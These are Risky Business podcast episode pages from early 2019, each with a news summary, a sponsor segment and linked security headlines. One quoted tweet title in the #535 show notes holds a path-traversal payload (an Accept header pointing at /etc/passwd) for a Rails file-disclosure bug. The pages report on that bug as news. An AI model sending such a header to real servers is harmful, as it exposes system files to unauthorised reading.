Then finally we’ll be hearing from Nucleus. This is a new company and if your job is managing vulnerabilities and vuln scanners in your org then straight up, just skip to the Nucleus interview immediately. They’ve created a web app that normalises vulnerability scanning information. It’ll take the outputs from Snyk, Rapid7, Checkmarx, Netsparker, OpenVAS, Twistlock, Fortify, Burp Suite, Nessus, Qualys, Acunetix AND others.

It ingests all of this data, normalises it, then plumbs these alerts through to the right people through a multitude of different ticketing systems. If you’re stuck in the 7th layer of Sharepoint or Spreadsheet vulnerability management hell, this is a solution to your problems. You will weep salty tears of joy when you hear this one. Free trials of Nucleus are also available.

Links to the companies featured are below!

Show notes
Cmd — Defense in depth for Linux
AlphaSOC
Overview > Nucleus Security

Risky Business #537 -- Assange arrested, WordPress ecosystem on fire

Apr 17, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s security news:

Julian Assange arrested, likely to be extradited to the USA
Krebs: Breach at outsourcing firm Wipro
WordPress 0day drama causing serious headaches
Silk Road 2’s “DPR2” sent to slammer
More from Kaspersky SAS

This week’s show is brought to you by Thinkst Canary! Thinkst founder Haroon Meer will be along in this week’s show to talk about the effect venture capital is having on the security ecosystem. He thinks VC money often makes weak ideas look strong, and in a market where it’s quite difficult to make informed purchasing decisions, that’s not a good thing.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Breaking Down the Julian Assange Hacking Case | WIRED
Experts: Breach at IT Outsourcing Giant Wipro — Krebs on Security
Silk Road 2 Founder Dread Pirate Roberts 2 Caught, Jailed for 5 Years - Motherboard
Chinese woman arrested at Mar-a-Lago 'up to something,' denied bail: judge - Reuters
A security researcher with a grudge is dropping Web 0days on innocent users | Ars Technica
Mailgun hacked part of massive attack on WordPress sites | ZDNet
PPD-20 successor has yielded ‘operational success,’ Federal CISO says
A Peek Into the Toolkit of the Dangerous 'Triton' Hackers | WIRED
DHS, FBI say election systems in all 50 states were targeted in 2016 | Ars Technica
Quasi-Russian upstart reportedly targeted Ukraine in cyber-espionage campaign
Patrick Gray 🥚 on Twitter: "Great scoop from @Commsday Looks like @ASDGovAu is going to rip up its contract with @Cloudflare because they host Nazi forums.…"
Dragonblood vulnerabilities disclosed in WiFi WPA3 standard | ZDNet
Confluence Security Advisory - 2019-03-20 - Atlassian Documentation
A New Breed of ATM Hackers Gets in Through a Bank’s Network | WIRED
Mysterious Hackers Hid Their Swiss Army Spyware for 5 Years | WIRED
Kaspersky: 70 percent of attacks now target Office vulnerabilities | ZDNet
EU: No evidence of Kaspersky spying despite 'confirmed malicious' classification | ZDNet
DHS alerts industry to insecure enterprise VPN apps
Shimo VPN service contains six unpatched vulnerabilities, Talos discovers
‘Land Lordz’ Service Powers Airbnb Scams — Krebs on Security
Hackers publish personal data on thousands of US police officers and federal agents | TechCrunch
Former Senate IT intern admits to doxing US senators on Twitter and Wikipedia | ZDNet
A hacker has dumped nearly one billion user records over the past two months | ZDNet
Google DLP Makes It Easier to Safeguard Sensitive Data Troves | WIRED
Microsoft Email Hack Shows the Lurking Danger of Customer Support | WIRED
Fortinet settles charges of selling intentionally mislabeled Chinese-made tech to U.S. military
Security Engineer, Detection - Google - Sydney NSW, Australia - Google Careers
Security Engineer, Information Security and Privacy Incident Response - Google - Sydney NSW, Australia - Google Careers
Thinkst Canary

Risky Business #536 -- Mar-a-Lago arrest, ASUS supply chain attack and more

Apr 10, 2019


In this week’s show Patrick Gray and Adam Boileau recap all the infosec news of the last three weeks, including:

Chinese woman arrested at Mar-a-Lago being very shady
The ASUS supply chain attack
Flame-related malware lived on longer than expected
bootstrap-sass Ruby gem backdoored
Latest on Norsk Hydro and other victims of the same crew
More trouble at Toyota
Huawei spanked by UK oversight panel
Exodus govvie malware affects Android and iOS
Plus much, much more

This week’s sponsor interview is with Kumud Kalia, the Chief Information and Technology Officer of Cylance. They actually dropped a really interesting product announcement at RSA a few weeks back and Kumud will be along later on to tell us about that. The tl;dr: it’s an agent that models endpoint behaviour, so when someone - or something - else starts using that endpoint to do things that don’t fit the user profile, action can be taken.

It’s the type of tech concept that normally belongs in academic papers, not in products people can actually buy. That’s an interesting chat.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Feds: Woman arrested at Mar-a-Lago had hidden-camera detector | Miami Herald
Hackers Hijacked ASUS Software Updates to Install Backdoors on Thousands of Computers - Motherboard
ASUS releases fix for Live Update tool abused in ShadowHammer attack | ZDNet
Researchers publish list of MAC addresses targeted in ASUS hack | ZDNet
Nation-state hacking kit ‘Flame’ had a second life, researchers say
Malicious remote code execution backdoor discovered in the popular bootstrap-sass Ruby gem | Snyk
Norsk Hydro ransomware incident losses reach $40 million after one week | ZDNet
Norsk Hydro will not pay ransom demand and will restore from backups | ZDNet
Arizona Beverages knocked offline by ransomware attack | TechCrunch
Ransomware Forces Two Chemical Companies to Order ‘Hundreds of New Computers’ - Motherboard
Toyota announces second security breach in the last five weeks | ZDNet
Huawei's Problem Isn't Chinese Backdoors. It's Buggy Software | WIRED
HCSEC_OversightBoardReport-2019.pdf
In issuing 5G recommendations, E.U. spurns U.S. hardline on Huawei
Bezos’ Investigator Gavin de Becker Finds the Saudis Obtained the Amazon Chief’s Private Data
NSO Group Says It Didn’t Hack Jeff Bezos On Behalf of Saudi Arabia - Motherboard
'Exodus' Spyware Posed as a Legit iOS App | WIRED
Former NSA spies hacked BBC host, Al Jazeera chairman for UAE
Lazarus rises in Israel with attempted hack of defense company, researchers say
Defense Ministry rebukes Israeli spy tech company for unlawful exports | The Times of Israel
Islamic State's collapse hastened with help of Australian cyber spies - ABC News (Australian Broadcasting Corporation)
Company sues worker who fell for email scam - BBC News
Utah Just Became a Leader in Digital Privacy | WIRED
Office Depot rigged PC malware scans to sell unneeded $300 tech support | Ars Technica
Microsoft warns Windows 7 users of looming end to security updates | TechCrunch
Brace yourselves: Exploit published for serious Magento bug allowing card skimming [Updated] | Ars Technica
Warfare Plugins on Twitter: "WE ARE AWARE OF A ZERO-DAY EXPLOIT AFFECTING SOCIAL WARFARE CURRENTLY BEING TAKEN ADVANTAGE OF IN THE WILD. Our developers are working to release a patch within the next hour. In the meantime, we recommend disabling the plugin. We will update you as soon as we know more."
Pipdig Update: Dishonest Denials, Erased Evidence, and Ongoing Offenses
Two serious WordPress plugin vulnerabilities are being exploited in the wild | Ars Technica
Ex-NSA contractor pleads guilty to vast classified data leak, faces 9 years in prison
Report deems Russia a pioneer in GPS spoofing attacks | ZDNet
Above Us Only Stars - Exposing GPS Spoofing in Russia and Syria - Association of Old Crows
Researchers find 36 new security flaws in LTE protocol | ZDNet
AT&T, Comcast successfully test SHAKEN/STIR protocol for fighting robocalls | ZDNet
Facebook Stored Hundreds of Millions of User Passwords in Plain Text for Years — Krebs on Security
Third-Party Apps Exposed Over 540 Million Facebook Records | WIRED
Man Behind Fatal ‘Swatting’ Gets 20 Years — Krebs on Security
Top dark web marketplace will shut down next month | ZDNet
Lithuanian man pleads guilty to scamming Google and Facebook out of $123 million | ZDNet
China Considers Ban On Cryptocurrency Mining Because It's A Stupid Waste Of Energy | Gizmodo Australia
Vigilantes Counter Christchurch Manifesto with Weaponized Version
RedTeam Pentesting on Twitter: "We were also quite surprised to find this /etc/nginx.conf in…"
Announcing QueryCon 2019 | Trail of Bits Blog - QueryCon 2019
QueryCon 2019 — Hosted by Trail of Bits, with Kolide and Carbon Black Tickets, Thu, Jun 20, 2019 at 9:00 AM | Eventbrite

Risky Biz Soap Box: All about WebAuthn with Duo Security

Apr 2, 2019


This is a wholly sponsored podcast brought to you by Duo Security.

WebAuthn is a new multifactor authentication standard for the web that is rooted in public-key cryptography. Some of you would already be using similar authentication standards in apps without even thinking about it, like doing biometric authentication in your banking apps. You want to log in via your app and it scans your face to auth you, that sort of thing. WebAuthn makes those types of authentication actions available to users through the browser.

It’s now an official W3C standard supported by most browsers. It’s the future of auth on the Web.

Duo Security has been involved a little bit with the standards process, and in this edition of the Soap Box podcast you’re going to hear a nearly hour-long conversation between myself, Nick Steele and James Barclay, who are Duo’s resident WebAuthn dudes at Duo Labs.

I hope you enjoy this conversation.

Show notes
Touch ID and Beyond: Duo’s Plans for WebAuthn | Duo Security
Guide to Web Authentication
GitHub - duo-labs/android-webauthn-authenticator: A WebAuthn Authenticator for Android leveraging hardware-backed key storage and biometric user verification.
Web Authentication: An API for accessing Public Key Credentials Level 1

Risky Business #535 -- Stop giving Cloudflare money

Mar 20, 2019


In this week’s show Patrick Gray and Alex Stamos discuss the week’s news, as well as discussing the rise of white supremacist communities and propaganda on the Internet and what can be done about it.


Norsk Hydro ransomwared
Huawei ban gets more and more political
APT40 hitting USA hard
Cyber Command’s Euro road-trip
Kremlin interference in EU elections extremely likely
US Senators seek information on breaches targeting them
Cloudflare won’t pull service from 8chan in wake of NZ attack
Beto O’Rourke was cDc member
New Mirai variant
150 million Android devices hosed by new malware
Much, much more

This week’s show is brought to you by Chronicle Security! We’ll be joined by Chronicle co-founders Shapor Naghibzadeh and Mike Wiacek. They had a tremendously successful launch at RSA and they’re going to pop in to tell us about some near future plans they have for their Backstory product.

Links to everything are below, and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes
Norsk Hydro Ransomware Attack Is `Severe' But All Too Common - Bloomberg
Antivirus scan for c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15 at 2019-03-19 12:37:54 UTC - VirusTotal
When Facebook Goes Down, Don't Blame Hackers | WIRED
U.S. Campaign to Ban Huawei Overseas Stumbles as Allies Resist - The New York Times
Navy, Industry Partners Are ‘Under Cyber Siege’ by Chinese Hackers, Review Asserts - WSJ
Tim Watts MP on Twitter: "In a rambling and incoherent Op-Ed today, Barnaby Joyce, our former Deputy Prime Minister make a unilateral attribution of the recent incursions into Australia’s Parliamentry IT systems. The Morrison govt has not publicly attributed these incursions.…"
March for something that’s truly under threat: Western democracy
Cyber Command’s midterm election work included trips to Ukraine, Montenegro, and North Macedonia
Kremlin interference in EU vote is likely, says Estonian spy agency
Report: Tech Company In Steele Dossier May Have Been Used To Support DNC Hack
US senators want to know how many times they've been hacked | ZDNet
After The New Zealand Terror Attack, Here’s Why 8chan Won’t Be Wiped From The Web
How Right-Wing Social Media Site Gab Got Back Online | WIRED
Parliament TV and Radio - New Zealand Parliament
Facebook trolls and scammers from Kosovo are manipulating Australian users - ABC News (Australian Broadcasting Corporation)
Optus, Telstra, Vodafone Block 8chan, 4chan For Christc... | 10 daily
Dutton Wants To Rehash The Video Game Violence Debate After The NZ Attack
Facebook failed to block 20% of uploaded New Zealand shooter videos | TechCrunch
Beto O’Rourke’s secret membership in America’s oldest hacking group
'Make money work for me': Sydney man charged with stealing $100,000 via phone porting
A huge trove of medical records and prescriptions found exposed | TechCrunch
New Mirai malware variant targets signage TVs and presentation systems | ZDNet
Microsoft releases Application Guard extension for Chrome and Firefox | ZDNet
North Korean diplomats in Spain: CIA implicated in attack on North Korean embassy in Madrid | In English | EL PAÍS
Dissidents behind raid on N.Korea Madrid embassy: US paper - The Local
Almost 150 million users impacted by new SimBad Android adware | ZDNet
Most Android Antivirus Apps Are Garbage | WIRED
Nasty WinRAR bug is being actively exploited to install hard-to-detect malware | Ars Technica
Proof-of-concept code published for Windows 7 zero-day | ZDNet
Malicious Counter-Strike 1.6 servers used zero-days to infect users with malware | ZDNet
“Yelp, but for MAGA” turns red over security disclosure, threatens researcher | Ars Technica
Local privilege escalation via the Windows I/O Manager: a variant finding collaboration – Security Research & Defense
iblue on Twitter: "So, that's CVE-2019-5418. Accept: ../../../../../../../../../etc/passwd (And we might see more fun involving the PathResolver in the future :))…"
CVE-2019-7644: How Does this Happen?
Chronicle Security - Careers

Risky Business #534 -- Manning back in clink, automotive industry under attack

Mar 13, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s news:

Chelsea Manning back in jail
Citrix owned, Resecurity claims it was Iran. Again. Because reasons, apparently.
Huawei politics get messy
EXCLUSIVE: Toyota Oz, other carmakers likely targeted by APT32 (Vietnam)
Much, much more

This week’s sponsor is Senetas. They make layer 2 encryption gear but recently made a US$8m investment into Votiro, a Content Disarm and Reconstruction (CDR) play. Votiro CEO Aviv Grafi is this week’s sponsor guest. He stops by to explain CDR tech.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Chelsea Manning jailed after refusing to testify about WikiLeaks - CNNPolitics
Citrix discloses security breach of internal network | ZDNet
Citrix investigating unauthorized access to internal network | Citrix Blogs
Iranian-backed hackers stole data from major U.S. government contractor
Deacon Blues on Twitter: "Have about closed the loop on who is behind Resecurity, the mysterious company attributing the Citrix hack to Iran. It seems to be the work of one man, Andrey Andreevich Komarov, aka Andrew Komarov.…"
US ambassador in Berlin urges Germany to cut ties with Huawei
Pompeo warns allies Huawei presence complicates partnership with U.S. | Reuters
Huawei’s 5G equipment is a manageable risk, British intelligence claims - The Verge
UN report links North Korean hackers to theft of $571 million from cryptocurrency exchanges
China database lists 'breedready' status of 1.8 million women | World news | The Guardian
800+ Million Emails Leaked Online by Email Verification Service - Security Discovery
Releasing the NSA’s Previously Classified Tool ‘Ghidra’ For Free Is a ‘Game Changer’ - Motherboard
Facebook Suit: Ukrainian Hackers Used Quizzes to Take Data from 60,000 Users
A world of hurt after GoDaddy, Apple, and Google misissue >1 million certificates | Ars Technica
The Prototype iPhones That Hackers Use to Research Apple’s Most Sensitive Code - Motherboard
Google reveals Chrome zero-day under active attacks | ZDNet
Pipes on Twitter: "Google TAG have run down and identified iOS, Chrome and Windows 0days in the last few weeks. @ShaneHuntley Are we going to get some insight on which group you folk are pulling apart later? Sounds like fun times 😉"
Russia blocks encrypted email provider ProtonMail | TechCrunch
Tufts expelled a student for grade hacking. She claims innocence | TechCrunch
Lamborghini-driving bitcoin trader charged with drug trafficking
Cryptocurrency entrepreneur pleads guilty in 'Bitcointopia' fraud - Los Angeles Times
Car alarms with security flaws put 3 million vehicles at risk of hijack | TechCrunch
Silencing Cylance: A Case Study in Modern EDRs – MDSec
Glitching Trezor using EMFI Through The Enclosure – Colin O’Flynn
Extracting BitLocker keys from a TPM
WDS bug lets hackers hijack Windows Servers via malformed TFTP packets | ZDNet
Cisco tells Nexus switch owners to disable POAP feature for security reasons | ZDNet
Auth0 Security Bulletin CVE-2019-7644
Votiro Disarmer Takes Cyber Security to the Next-Generation
Senetas announces $8m investment in Votiro Disarmer

Risky Business #533 -- Ghidra release, NSA discontinues metadata program and more

Mar 6, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s news:

The NSA isn’t that interested in phone metadata anymore
More Chinese mass surveillance data leaks
Chelsea Manning, David House subpoenaed over Wikileaks
Quadriga cold wallets were actually empty at time of founder’s death
NSA deployed “rm -rf / shark” at Internet Research Agency
HackerOne follows Bugcrowd into pentesting
NSA releases Ghidra
Much, much more!

This week’s sponsor interview is with Chris Kennedy, AttackIQ’s CISO and VP of customer success. We’ll be talking about a few things, really, including how continuous validation of security controls like monitoring is a good thing. Everyone uses software like Tenable to verify patching, so why not do the same for your monitoring?

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
The NSA has reportedly stopped data-mining Americans' phone and SMS records / Boing Boing
House aide: NSA has shut down phone call record surveillance | Ars Technica
China’s “democracy” includes mandatory apps, mass chat surveillance | Ars Technica
China claims detained Canadians formed spy link
As Trump and Kim Met, North Korean Hackers Hit Over 100 Targets in U.S. and Ally Nations - The New York Times
Disclosing Subpoena for Testimony, Chelsea Manning Vows to Fight - The New York Times
WikiLeaks Veteran: I ‘Cooperated’ With Feds ‘in Exchange for Immunity’
Mystery as Quadriga crypto-cash goes missing - BBC News
NSA’s top policy advisor: It’s time to start putting teeth in cyber deterrence | Ars Technica
US wiped hard drives at Russia's 'troll factory' in last year's hack | ZDNet
Vulnerability exposes location of thousands of malware C&C servers | ZDNet
Former Hacking Team Members Are Now Spying on the Blockchain for Coinbase - Motherboard
Coinbase Says Ex-Hacking Team Members Will ‘Transition Out’ After Users Protest - Motherboard
HackerOne thinks its freelance hackers can conduct penetration tests better than actual pentesting companies
New Software Helps to Mitigate Supply Chain Management Risk > National Security Agency | Central Security Service > Article View
Ghidra
Hacker Fantastic on Twitter: "Ghidra opens up JDWP in debug mode listening on port 18001, you can use it to execute code remotely 🤦‍♂️.. to fix change line 150 of support/ from * to"
Backstory: An Alphabet Moon Shot Wants to Store the Security Industry's Data | WIRED
BlackBerry Cylance Delivers First Proactive Behavioral Analytics Solution with CylancePERSONA
Martijn Grooten on Twitter: "Shamir is of course right in his criticism of strict US visa procedures, but to add a sobering perspective, we have had speakers who couldn't get a visa when we had our conference in the US, Canada and the EU. For most of the world, visas for the West are really hard.…"
W3C finalizes Web Authentication (WebAuthn) standard | ZDNet
Hackers have started attacks on Cisco RV110, RV130, and RV215 routers | ZDNet
Researchers uncover ring of GitHub accounts promoting 300+ backdoored apps | ZDNet
Google Reveals "BuggyCow," a Rare MacOS Zero-Day Vulnerability | WIRED
Adobe releases out-of-band update to patch ColdFusion zero-day | ZDNet
PoC Buffer Overflow exploitation in the British Airways Entertainment System | LinkedIn

Risky Biz Soap Box: PRODUCT LAUNCH: Backstory by Alphabet's Chronicle

Mar 4, 2019


In this edition of the show we’re playing a small part in Chronicle’s launch of its flagship product, Backstory.

Chronicle is of course the security spinoff of Google’s parent company, Alphabet. The launch of Chronicle itself was announced about a year ago, but until now it’s only really had one product: VirusTotal Enterprise. That all changed today when Chronicle launched Backstory at the RSA conference in the USA.

I was lucky enough to see a demo of Backstory before we recorded this interview last week, and I’m going to characterise it in a way that Chronicle probably won’t like, but it’s basically a cloud-SIEM, albeit a very good one.

Backstory ingests logs from a bunch of data sources – DNS lookup information, DHCP info, your EDR logs (from your Crowdstrike or Carbon Black software), web proxy logs, firewall alerts – and then it structures this stuff so you can make use of it. You get nice pointy-clicky timelines and useful visualisations. That’s handy enough, but keep in mind your logs are now with the company that is responsible for VirusTotal. They have some pretty good intel, and they can now apply various IOCs to the logs you’ve submitted.

So one obvious use case for Backstory is doing the type of threat hunting threat hunters like to do, but beyond that, this is likely going to become a pretty useful alerting platform.

Show notes
Chronicle launches Backstory

Risky Business #532 -- A big week of research and tech news

Feb 28, 2019


On this week’s show Adam and Patrick discuss the week’s security news:

Cyber Command kicks the IRA off the Internet on election day
WSJ reporting on Iran vs Australia likely incorrect
Two Russian cybersecurity professionals sentenced over treason
DPRK spearphishing US summit participants
LOTS of technical news and research this week

This week’s show is brought to you by Remediant. Their CEO Tim Keeler will be along in this week’s sponsor segment to talk about how they’re doing “virtual directory binding” to make managing Linux accounts via Active Directory less traumatic. If you’re struggling with horrible, horrible PAM solutions in your devops environments, have a listen to that one.

*** NOTE FROM PAT: I made some mistakes in the recording phase of this week’s show. As a result, my vocal audio is pretty atrocious. Sorry! ***

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Cyber Command put the kibosh on Russian trolls during the midterms
Iranian Group Blamed for Cyberattack on Australia’s Parliament - WSJ
China, not Iran, still the main suspect in hacking of Australia's political parties, say sources
Former Russian Cybersecurity Chief Sentenced to 22 Years in Prison — Krebs on Security
North Korean hackers go on phishing expedition before Trump-Kim summit
Supermicro hardware weaknesses let researchers backdoor an IBM cloud server | Ars Technica
The Missing Security Primer for Bare Metal Cloud Services – Eclypsium
The secret lives of Facebook moderators in America - The Verge
CRXcavator: Democratizing Chrome Extension Security | Duo Security
CRXcavator
Toyota Australia says no customer data taken in attempted cyber attack | Business | The Guardian
Toyota Australia hack update | Automotive Industry News | just-auto
Many websites threatened by highly critical code-execution bug in Drupal | Ars Technica
It took hackers only three days to start exploiting latest Drupal bug | ZDNet
Former Hacking Team Members Are Now Spying on the Blockchain for Coinbase - Motherboard
attachment.cgi
For many crooks, malware is out and PowerShell attacks are in, IBM says
New flaws in 4G, 5G allow attackers to intercept calls and track phone locations | TechCrunch
Cryptocurrency wallet caught sending user passwords to Google's spellchecker | ZDNet
POS firm says hackers planted malware on customer networks | ZDNet
Surveillance firm asks Mozilla to be included in Firefox's certificate whitelist | ZDNet
New browser attack lets hackers run bad code even after users leave a web page | ZDNet
WinRAR versions released in the last 19 years impacted by severe security flaw | ZDNet
Dow Jones’ watchlist of 2.4 million high-risk clients has leaked | TechCrunch
Intel open-sources HBFA app to help with firmware security testing | ZDNet
Thunderclap flaws impact how Windows, Mac, Linux handle Thunderbolt peripherals | ZDNet
Spain investigates raid on North Korean embassy: sources | Reuters
Conference | 0xCC | Melbourne

Risky Business #531 -- Australia's political parties targeted, the Witt indictment and more

Feb 20, 2019


Adam Boileau is along this week to discuss the week’s security news, which also features comment from Dmitri Alperovitch, Klon Kitchen and The Grugq. We cover:

Former USAF counterintelligence official indicted over spearphishing, leaking secrets
Australia’s major political parties targeted by APT crew that totally isn’t Chinese. (It’s Chinese)
More on the Iran DNS hijacks
Venezuelans phished by their own government
China’s mass surveillance of Uyghur Muslims laid bare in data leak
Millions of Swedes have their healthcare help-line calls exposed
Bank of Valletta dodges a bullet, catches fraudulent transfers
VK gets Samy’d
Calls for GDPR-like law in USA
Marcus “Malwaretech” Hutchins has a bad week

This week’s sponsor interview is with Jason Haddix of Bugcrowd. He’ll be along to talk a little more about what Bugcrowd calls next-generation pentests. They claim one of their tests is sufficient for compliance purposes under PCI, ISO or NIST and they’ve had a third party auditor prove that for them. They also say the service has really taken off despite being launched only a couple of months ago.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Air Force Defector to Iran Severely Damaged U.S. Intelligence Efforts, Ex-Officials Say - The New York Times
Spy Betrayed U.S. to Work for Iran, Charges Say - The New York Times
Game of Thrones hacker worked with US defector to hack Air Force employees for Iran | ZDNet
Scott Morrison details cyber attack on Australia's major political parties
How China and Russia are readying themselves for a US cyber war
Chinese traders freeze Australian coal orders amid 40-day customs delays: sources | Reuters
A Deep Dive on the Recent Widespread DNS Hijacking Attacks — Krebs on Security
Albania expels Iranian diplomats on national security grounds | Reuters
Venezuela’s Government Appears To Be Trying to Hack Activists With Phishing Pages - Motherboard
China's mass surveillance of Uyghur Muslims in Xinjiang province revealed in data security flaw - ABC News (Australian Broadcasting Corporation)
Millions of calls to Swedish healthcare hotline left unprotected online - The Local
Hackers tried to steal €13 million from Malta's Bank of Valletta | ZDNet
State of the Hack S2E01: #NoEasyBreach REVISITED | FireEye Inc
Russian hackers 8 times faster than Chinese, Iranians, North Koreans, says report
White hats spread VKontakte worm after social network doesn't pay bug bounty | ZDNet
You Don't Get To Learn How The FBI Tried To Crack Facebook Messenger Encryption, Judge Rules | Gizmodo Australia
GAO gives Congress go-ahead for a GDPR-like privacy legislation | ZDNet
NSO Group founders buy back their spyware company
MalwareTech loses bid to suppress damning statements made after days of partying | Ars Technica
Researchers hide malware in Intel SGX enclaves | ZDNet
Google Play Store app rejections up 55% from last year, app suspensions up 66% | ZDNet
Behold, the Facebook phishing scam that could dupe even vigilant users | Ars Technica
Facebook Popup Phishing Page (Social Login) - YouTube
Google backtracks on Chrome modifications that would have crippled ad blockers | ZDNet
Scammers Are Filing Fake Trademarks to Steal High-Value Instagram Accounts - Motherboard
Google working on new Chrome security feature to 'obliterate DOM XSS' | ZDNet
Microsoft patches 0-day vulnerabilities in IE and Exchange | Ars Technica
Apple is forcing 2FA on iOS and macOS developers
Apple being sued because two-factor authentication on an iPhone or Mac takes too much time
Forced Two Factor Auth Will Cause Issues | Apple Developer Forums
Aspen Tech Policy Hub - A Silicon Valley-Style Think Tank
Next Gen Pen Testing

Risky Business #530 -- UAE's Project Raven, Bezosgate and more

Feb 12, 2019


Adam Boileau is back in the news seat this week. We talk about:

Amazing Reuters report on UAE’s “Project Raven”
Bezos’ dick pics, Saudi Arabia and a creepy brother
US government security staffers play post-shutdown catch-up
Krebs: National Credit Union Administration probably pwned
Russia to test complete disconnection from wider Internet
China suspected of involvement in Australian parliament hack
Trump likely to ban all Chinese telco equipment makers from US builds
Lasers
Google: iOS privesc 0days were in wild
$145m in cryptocurrency lost forever due to exchange CEO death
VFEmail has a very bad day
Facebook/Apple cert wars
MORE

This week’s show is brought to you by AustCyber, a nonprofit funded by grants from the Australian government. Its goal is to promote Australia’s cybersecurity industry.

AustCyber CEO Michelle Price will be along in this week’s sponsor interview to tell us all about what they’ve got planned for RSA.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Special Report - Inside the UAE’s secret hacking team of U.S. mercenaries | Reuters
Project Raven: What Happens When U.S. Personnel Serve a Foreign Intelligence Agency? - Lawfare
No thank you, Mr. Pecker – Jeff Bezos – Medium
Mistress’ Brother Leaked Bezos’ Racy Texts to Enquirer, Sources Say
Bezos Could Put National Enquirer Brass in Jail
Cybersecurity Workers Scramble to Fix a Post-Shutdown Mess | WIRED
Phishers Target Anti-Money Laundering Officers at U.S. Credit Unions — Krebs on Security
Russia to disconnect from the internet as part of a planned test | ZDNet
China link possible in cyber attack on Australian Parliament computer system, ABC understands - ABC News (Australian Broadcasting Corporation)
Trump likely to sign executive order banning Chinese telecom equipment next week - POLITICO
Huawei Sting Offers Rare Glimpse of U.S. Targeting Chinese Giant - Bloomberg
China's cybersecurity law update lets state agencies 'pen-test' local companies | ZDNet
Google warns about two iOS zero-days 'exploited in the wild' | ZDNet
$145 million funds frozen after death of cryptocurrency exchange admin | ZDNet
Hackers wipe US servers of email provider VFEmail | ZDNet
Zcash cryptocurrency fixes infinite counterfeiting vulnerability | ZDNet
Biohackers Encoded Malware in a Strand of DNA | WIRED
Google releases Chrome extension that alerts users of breached passwords | Ars Technica
Big Telecom Sold Highly Sensitive Customer GPS Data Typically Used for 911 Calls - Motherboard
Hundreds of Bounty Hunters Had Access to AT&T, T-Mobile, and Sprint Customer Location Data for Years - Motherboard
How Hackers and Scammers Break into iCloud-Locked iPhones - Motherboard
Apple restores Facebook’s ability to run internal iOS apps - The Verge
New TLS encryption-busting attack also impacts the newer TLS 1.3 | ZDNet
Atlassian leads encryption law revolt as Peter Dutton stands firm
Australian government clamping down on security research, academic says - Computerworld
Swiss government invites hackers to pen-test its e-voting system | ZDNet
Indecent disclosure: Gay dating app left “private” images, data exposed to Web (Updated) | Ars Technica
AustCyber supports the development of a vibrant and globally competitive cyber security sector | AustCyber

Risky Biz Soap Box: Polyswarm builds a marketplace for AV engines

Feb 7, 2019


As regular listeners know, this isn’t the regular weekly Risky Business podcast: all Soap Box podcasts are paid promotions. We ran 10 of these last year and we’re running more of them this year (the total number is up to 14), but we’re running fewer of our other promotional podcast, Snake Oilers.

In this Soap Box podcast we’re chatting with a company with a legitimately fascinating origin story.

You remember how in 2017 and 2018 people were running all these shonky initial coin offerings where they’d sell off millions of dollars of crypto tokens on the basis of a two minute video and a whitepaper? What happened in a lot of these cases is after the ICO the founders would take the money, launder it and move to the Bahamas.

Well, Polyswarm raised its money in an ICO. About $26m US dollars (!!). And, because they weren’t mainlining the ICO Kool-Aid, they cashed out about half of what they raised into real money before cryptocurrency values crashed.

Instead of moving to the Bahamas, they actually stuck around to build the business that tokenholders had chosen to fund. Their token value has crashed like everyone else’s has, but that doesn’t matter – they’re funded, and because of their unconventional funding source they don’t have a whole bunch of venture capitalists breathing down their neck.

So, what’s the business? It’s a marketplace for threat detection. Yes, my pinned tweet says “I do not want your blockchain expert as a guest on my podcast,” and yes, this company does use blockchain fairy dust, but as you’ll hear, the blockchain element to this business isn’t really what it’s about. Indeed, the founder and CEO of Polyswarm, Steve Bassi, says he would find life a lot easier in many ways if they weren’t actually using blockchain tech here as a marketplace enabler. He’s also banned himself from ever attending a blockchain conference again in his life.

Ok, so what is the Polyswarm marketplace and how does it work? As you’ll hear in this interview it took me a bit to actually understand exactly what they’re doing here, but what they’ve essentially built is a marketplace for AV. The best way to explain this is to just explain how it works. If you’re an enterprise client or an MSSP you can submit a sample to this marketplace. You’re submitting it with a question – is this file bad or good – and you attach a tokenised value to the answer.

On the other side of the equation are all these AV engines. Big ones, small ones… even tiny little micro engines that are only good at detecting very niche threats. So the enterprise submits the sample – that can be a whole file or just a hash – and it gets distributed to all the people who are running these AV engines. They scan the file, and if they’re super confident on an answer, they return that answer as well as a tokenised stake as a measure of their confidence. The idea is you can have a competitive marketplace for threat detection in which even niche players can participate. Polyswarm CEO Steve Bassi joined me to talk me through the whole concept.

Show notes
Enterprise Clients - PolySwarm
PolySwarm (NCT) - All information about PolySwarm ICO (Token Sale) - ICO Drops

Risky Business #529 -- Special guest Rob Joyce, NSA

Feb 5, 2019


There’s no news segment in this week’s show. Instead, you’re going to hear a long-form feature interview I did with the NSA’s Rob Joyce.

Rob is probably best known for his tenure as special assistant to the president on cybersecurity and for being the cybersecurity coordinator on the US National Security Council.

He also served as acting homeland security advisor to Donald Trump for a short time following the departure of Tom Bossert from the White House. In May last year he went back to NSA where he now serves as a senior advisor to the director of NSA for Cyber Security strategy.

Some of you may also know Rob for his blockbuster January 2016 conference talk “disrupting nation state hackers” back when he was heading TAO at NSA. Good talk, that one, and it’s on YouTube. (Link below.)

But gradually over the last couple of years Rob has emerged as a sort of friendly face of NSA, at least as far as the infosec industry is concerned. He spoke at DEF CON last year, he often appears at events and on panels and he doesn’t seem terrified of actually commenting on things.

This is a huge departure from the historical way agencies like NSA handled themselves. But as you’ll hear, Rob sees this new approach as being vital to the NSA’s current-day mission.

Topics covered include:

DoJ indictments of foreign gov hackers
5G networks and Huawei
Kaspersky AV
Bloomberg’s Supermicro story
Software and hardware supply chain security
The USG aggressively burning adversary tools

